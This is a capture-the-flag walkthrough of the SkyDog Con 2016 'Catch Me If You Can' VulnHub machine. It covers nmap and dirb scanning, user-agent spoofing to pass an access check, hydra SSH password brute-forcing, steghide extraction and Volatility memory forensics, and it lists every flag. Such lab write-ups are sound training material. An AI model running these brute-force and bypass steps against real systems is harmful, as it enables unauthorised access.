Write-Up: SkyDog Con CTF 2016 – Catch Me If You Can


Introduction

So our target today is another Capture the Flag game from VulnHub.

SkyDog Con CTF 2016 - Catch Me If You Can [Download]

Difficulty: Beginner/Intermediate

Instructions: The CTF is a virtual machine and works best in Virtual Box. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above make sure that USB 2.0 is disabled before booting up the VM. The networking is setup for a Host-Only Adapter by default but you can change this before booting up depending on your networking setup. The Virtual Machine Server is configured for DHCP. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Flags

The eight flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533

Flag #1 Don’t go Home Frank! There’s a Hex on Your House.

Flag #2 Obscurity or Security?

Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

Flag #4 A Good Agent is Hard to Find.

Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 Where in the World is Frank?

Flag #7 Frank Was Caught on Camera Cashing Checks and Yelling - I’m The Fastest Man Alive!

Flag #8 Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!

Looks like we should have a good time with this one, lets get started! After downloading and booting our target looks like we have another Ubuntu 16 host.

Network Scanning

Firing up 'nmap' we can find our target on our Host Only network.

root@nethunterarch:~# nmap -sn -T5 192.168.56.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:14 MST
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (1 host up) scanned in 10.53 seconds
root@nethunterarch:~# nmap -sn -T5 192.168.56.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:16 MST
Nmap scan report for 192.168.56.100
Host is up (0.000077s latency).
MAC Address: 08:00:27:53:A6:6E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00029s latency).
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.23 seconds
root@nethunterarch:~# nmap -T5 -A 192.168.56.102

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:19 MST
 Nmap scan report for 192.168.56.102
 Host is up (0.00031s latency).
 Not shown: 997 filtered ports
 PORT STATE SERVICE VERSION
 22/tcp closed ssh
 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
 | ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
 | Not valid before: 2016-09-21T14:51:57
 |_Not valid after: 2017-09-21T14:51:57
 |_ssl-date: TLS randomness does not represent time
 MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.10 - 4.2
 Network Distance: 1 hop

TRACEROUTE
 HOP RTT ADDRESS
 1 0.31 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Checking into the website we notice some strange comments that lead us to an interesting string in the comments of a js script.

<!--[If IE4]><script src="/oldIE/html5.js"></script><![Make sure to remove this before going to PROD]-->
/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */ 
/*! HTML5 Shiv v3.6 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed */ 
/* Source: https://github.com/aFarkas/html5shiv — No longer maintained */

Also while searching for comments I found the following

/* maindev -  6/7/02 Adding temporary support for IE4 FBI Workstations */
/* newmaindev -  5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */

It looks like we may have a viable username for later... Now on to that strange string? running it through 'hashid' as well as 'HashKiller' doesn't reveal anything... then after running this bad boy through quite a gauntlet, I ran into some luck, looks like it was definitely a flag but dumped into hex! using RapidTables I was able to decode it...

flag{7c0132070a0ef71d542663e9dc1f5dee}

7c0132070a0ef71d542663e9dc1f5dee MD5 : nmap

At this point I realize that I never checked for non-common ports on my network scan - we lets get that out of the way, apparently that is the direction we are going anyhow, and while im at it I'm going to give dirb a workout and see if anything cool jumps out.

root@nethunterarch:~# dirb http://192.168.56.102 /usr/share/dirb/wordlists/big.txt

-----------------
 DIRB v2.22
 By The Dark Raver
 -----------------

START_TIME: Wed Feb 15 09:53:51 2017
 URL_BASE: http://192.168.56.102/
 WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.56.102/ ----
 + http://192.168.56.102/404 (CODE:200|SIZE:18360)
 ==> DIRECTORY: http://192.168.56.102/assets/
 + http://192.168.56.102/favicon (CODE:200|SIZE:1150)
 + http://192.168.56.102/favicon.ico (CODE:200|SIZE:1150)
 + http://192.168.56.102/index (CODE:200|SIZE:18357)
 + http://192.168.56.102/personnel (CODE:403|SIZE:131)
 + http://192.168.56.102/rules (CODE:200|SIZE:31156)
 + http://192.168.56.102/server-status (CODE:403|SIZE:302)

---- Entering directory: http://192.168.56.102/assets/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.
 (Use mode '-w' if you want to scan it anyway)

-----------------
 END_TIME: Wed Feb 15 09:54:00 2017
 DOWNLOADED: 20458 - FOUND: 7

Well looks like we may have an interesting directory 'personnel' - visiting the directory we get the following...

ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

we can check this out later, moving on to the nmap scan.

root@nethunterarch:~/Documents/skydog# nmap -T5 -p- --open 192.168.56.102

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-15 08:58 MST
 Nmap scan report for 192.168.56.102
 Host is up (0.00029s latency).
 Not shown: 65531 filtered ports, 1 closed port
 Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
 PORT      STATE SERVICE
 80/tcp    open  http
 443/tcp   open  https
 22222/tcp open  easyengine
 MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.76 seconds
 root@nethunterarch:~/Documents/skydog# nc 192.168.56.102 22222
 SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1

looks like we found an intresting port for SSH and to boot we got a flag!

root@nethunterarch:~# ssh -p 22222 doug.peterson@192.168.56.102
 ###############################################################
 #                         WARNING                             #
 #        FBI - Authorized access only!                 #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 #         All actions Will be monitored and recorded          #
 #    Flag{53c82eba31f6d416f331de9162ebe997}              #
 ###############################################################
 doug.peterson@192.168.56.102's password:
 Permission denied, please try again.
 doug.peterson@192.168.56.102's password:
 Permission denied, please try again.
 doug.peterson@192.168.56.102's password:
 Permission denied (publickey,password).

using HashKiller we have some luck decrypting the hash...

53c82eba31f6d416f331de9162ebe997 MD5 : encrypt

I'm not sure WTF that means but cool... we got our second flag. After some pondering I decided to move back to the https website, maybe that is what the flags hint is. pulling it up in a browser gives us an SSL warning; and purley out of habit (completely not on purpose here) I view the information on the cert and what do I find but another flag! W00t.

flag3{f82366a9ddc064585d54e3f78bde3221}

f82366a9ddc064585d54e3f78bde3221 MD5 : personnel

Well look at that, we are back to that 'personnel' directory... The page source gives us nothing, so how would the page validate where you are coming from? maybe a user agent? And looking back at the information we have gathered so far takes me back to the comment by doug about IE4 still being the Gold Image. So pulling out an old dusty list of user agent strings I finally found one for IE 4.

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

Then firing up firefox 'User-Agent Switcher' addon we hit some pay-dirt! looks like we got a portal.

And a flag at second glace! down in the bottom right...

14e10d570047667f904261e6d08f520f MD5 : evidence

We also find a strange comment in one of the lists.

  • Sixty-one on 7/4/6008

This looks like 617468 wonder if this is a password!? but giving it a go with doug.perterson as well as hanratty gives us nothing... After looking at the clue after the flag 'Clue = new+flag' I try that as a directory thinking that is probably not in my wordlist for dirb.. and yep looks like now we need a username and password! trying the same usernames as before we get no luck. At this point I struggled for a while thinking I missed something technical - time to turn to Google and maybe develop on the information I have collected so far. A quick Google Search for "doug perterson" fbi turns up nothing but walkthrough's for the game. Another search for "hanratty" fbi and we find out this is a character from the movie - and his first name is Carl, this could be good information and give us a possible username? If we follow the same convention as doug.perterson we now have carl.hanratty too. in the hint for flag five we have "The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices", maybe we need to learn about Carl and while we do that fire of a hydra bruteforce just to keep pressure on the target.

root@nethunterarch:~# hydra -l carl.hanratty -P /usr/share/wordlists/rockyou.txt 192.168.56.102 ssh -s 22222
 Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-15 10:52:11
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
 [DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
 [DATA] attacking service ssh on port 22222

*note: this brute force attempt as a failure - really just included it to try to keep the story straight

We learn from Wikipedia that Carl Hanratty has an ex-wife and daughter

Tom Hanks as Carl Hanratty, an FBI agent who pursues Frank for most of the film. 
Hanratty is often teased by other agents who take check fraud as a joke. Hanratty is divorced, 
and his daughter and ex-wife live in Chicago. In the end, Carl and Frank become great friends.

That information seems 'personal' - which is 'against best practices'. searching up on Carl's ex-wife doesn't yield anything, she must not be a character in the story. After looking up on the daughter she is not a character either, however carl mentions her in a comment.

Carl Hanratty: She was four when I left. Now she's 15. My wife's been remarried for 11 years. 
I see Grace every now and again.

Giving the username 'carl.hanratty' and password 'grace' a shot fails, but the password 'Grace' works! we are in! Giving those same credentials a shot on the ssh falls short ... bummer.

starting to look around we go to the 'Evidence Summary File' link and poof! a flag!

flag{117c240d49f54096413dd64280399ea9}

117c240d49f54096413dd64280399ea9 MD5 : panam

So I'm not sure what this hint is getting at yet but I am sure we will figure it out. Looking around a bit more we come across an image under the 'possible location' link - thinking we may be on the right track I pull down the image and run it through 'Steghide'.

root@nethunterarch:~/Documents/skydog# steghide --info image.jpg
 "image.jpg":
 format: jpeg
 capacity: 230.1 KB
 Try to get information about embedded data ? (y/n) y
 Enter passphrase:
 steghide: could not extract any data with that passphrase!

ahha! It looks like we have some stenography, but what what is the passphrase? going through my notes and trying all the possible candidates and a few out of some common wordlists I try the last flag mainly because I still don't understand its relevance.

root@nethunterarch:~/Documents/skydog# steghide --info image.jpg -p panam
"image.jpg":
  format: jpeg
  capacity: 230.1 KB
  embedded file "flag.txt":
    size: 71.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
root@nethunterarch:~/Documents/skydog# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@nethunterarch:~/Documents/skydog# cat flag.txt 
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda

Sure enough! we have our next flag and a hint to boot.

d1e5146b171928731385eb7ea38c37b8 MD5 : ILoveFrance

So at this point I spent a good amount of time trying to figure out the next step, probably reading way to deep into the movie - in the end I decide that I am going to make a targeted wordlist and see if I can force my way into the ssh server running on port 22222. So not getting side tracked but to explain my process I used 'cewl' to crawl the website on the target and then simply added some words from the movie and my notes...after that I fired up 'John the Ripper' to run permutations against my small wordlist to come up with something better.

root@nethunterarch:~/Documents/skydog# wc -l skydogwordlist
 26969 skydogwordlist

Now with 26k of usernames and passwords to try I wired up 'Hydra' and waited...

root@nethunterarch:~/Documents/skydog# hydra -L skydogwordlist -P skydogwordlist -s 22222 192.168.56.102 ssh
 Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-02-15 15:45:11
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [DATA] max 16 tasks per 1 server, overall 64 tasks, 727326961 login tries (l:26969/p:26969), ~710280 tries per task[DATA] attacking service ssh on port 22222
 [22222][ssh] host: 192.168.56.102   login: barryallen   password: iheartbrenda
 1 of 1 target successfully completed, 1 valid password found
 Hydra (http://www.thc.org/thc-hydra) finished at 2017-02-16 03:08:35

Awesome! now to move on!

root@nethunterarch:~/Documents/skydog# ssh -p 22222 barryallen@192.168.56.102
 ###############################################################
 #                         WARNING                             #
 #        FBI - Authorized access only!                 #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 #         All actions Will be monitored and recorded          #
 #    Flag{53c82eba31f6d416f331de9162ebe997}              #
 ###############################################################
 barryallen@192.168.56.102's password:
 Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

* Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
 7 updates are security updates.

barryallen@skydogconctf2016:~$

A quick look in our current directory as we got another flag!

barryallen@skydogconctf2016:~$ ls
 flag.txt  security-system.data
 barryallen@skydogconctf2016:~$ cat flag.txt
 flag{bd2f6a1d5242c962a05619c56fa47ba6}

bd2f6a1d5242c962a05619c56fa47ba6 MD5 : theflash

Looks like we have another file that looks pretty interesting.

barryallen@skydogconctf2016:~$ ls -lt security-system.data
 -rw-r--r-- 1 barryallen barryallen 74762682 Oct 10 18:29 security-system.data
 barryallen@skydogconctf2016:~$ file security-system.data
 security-system.data: Zip archive data, at least v2.0 to extract

Grabbing a local copy so we can dissect it...

root@nethunterarch:~# scp -P 22222 barryallen@192.168.56.102:/home/barryallen/security-system.data security-system.data
 ###############################################################
 #                         WARNING                             #
 #        FBI - Authorized access only!                 #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 #         All actions Will be monitored and recorded          #
 #    Flag{53c82eba31f6d416f331de9162ebe997}              #
 ###############################################################
 barryallen@192.168.56.102's password:
 security-system.data                          100%   71MB  30.4MB/s   00:02

After unzipping the archive looks like we have another roadblock its just a data file ...

root@nethunterarch:~/Documents/skydog# unzip security-system.data
 Archive:  security-system.data
 replace security-system.data? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
 inflating: security-system.data
 root@nethunterarch:~/Documents/skydog# file security-system.data
 security-system.data: data

In an attempt to identify what we have I run the file through strings.

root@nethunterarch:~/Documents/skydog# strings security-system.data
 ================== DOUBLE FAULT ================================
 ===== STACK SEGMENT OVERRUN or NOT PRESENT FAULT ===============
 ============== GENERAL PROTECTION FAULT ========================
 =================== PAGE FAULT =================================
 ** At linear address %lx
 ===================== EXCEPTION ================================
 tr=%x cr0=%lx cr2=%lx cr3=%lx
 gdt limit=%x base=%lx idt limit=%x base=%lx
 cs:eip=%x:%lx ss:esp=%x:%lx errcode=%x
 eax=%lx ebx=%lx ecx=%lx edx=%lx
 ds=%x es=%x
 edi=%lx esi=%lx ebp=%lx cr0=%lx
 fs=%x gs=%x
 flags=%lx

Awesome a portion of the massive output from the 'strings' command early on give me the idea that this is maybe a memory dump... easy way to tell for sure, lets warm it up with 'Volatitliy'.

root@nethunterarch:~/Documents/skydog# volatility -f security-system.data imageinfo
 Volatility Foundation Volatility Framework 2.6
 INFO    : volatility.debug    : Determining profile based on KDBG search...
 Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
 AS Layer1 : IA32PagedMemoryPae (Kernel AS)
 AS Layer2 : FileAddressSpace (/root/Documents/skydog/security-system.data)
 PAE type : PAE
 DTB : 0x33e000L
 KDBG : 0x80545b60L
 Number of Processors : 1
 Image Type (Service Pack) : 3
 KPCR for CPU 0 : 0xffdff000L
 KUSER_SHARED_DATA : 0xffdf0000L
 Image date and time : 2016-10-10 22:00:50 UTC+0000
 Image local date and time : 2016-10-10 18:00:50 -0400

Okay looks like we are in business - running through the options and tools within volatility I find something interesting...

root@nethunterarch:~/Documents/skydog# volatility -f security-system.data --profile=WinXPSP2x86 cmdscan
 Volatility Foundation Volatility Framework 2.6
 **************************************************
 CommandProcess: csrss.exe Pid: 560
 CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
 CommandCount: 2 LastAdded: 1 LastDisplayed: 1
 FirstCommand: 0 CommandCountMax: 50
 ProcessHandle: 0x2d4
 Cmd #0 @ 0x1024400: cd Desktop
 Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

This looks like more hex lets run it through RapidTables again - BINGO!

flag{841dd3db29b0fbbd89c7b5be768cdc81}

841dd3db29b0fbbd89c7b5be768cdc81 MD5 : Two[space]little[space]mice

So this being the last flag it looks like we are done - however I didn't understand it? two little mice? so quickly before wrapping this up I do a quick Google Search and there it is.

Frank Abagnale Sr.: Two little mice fell in a bucket of cream. The first mouse quickly gave up and drowned. 
The second mouse, wouldn't quit. He struggled so hard that eventually he churned that cream into butter and 
crawled out. Gentlemen, as of this moment, I am that second mouse.

Anyhow pretty fun CTF and liked the movie references (although challenging as I only seen the movie once a VERY long time ago) - Until next time...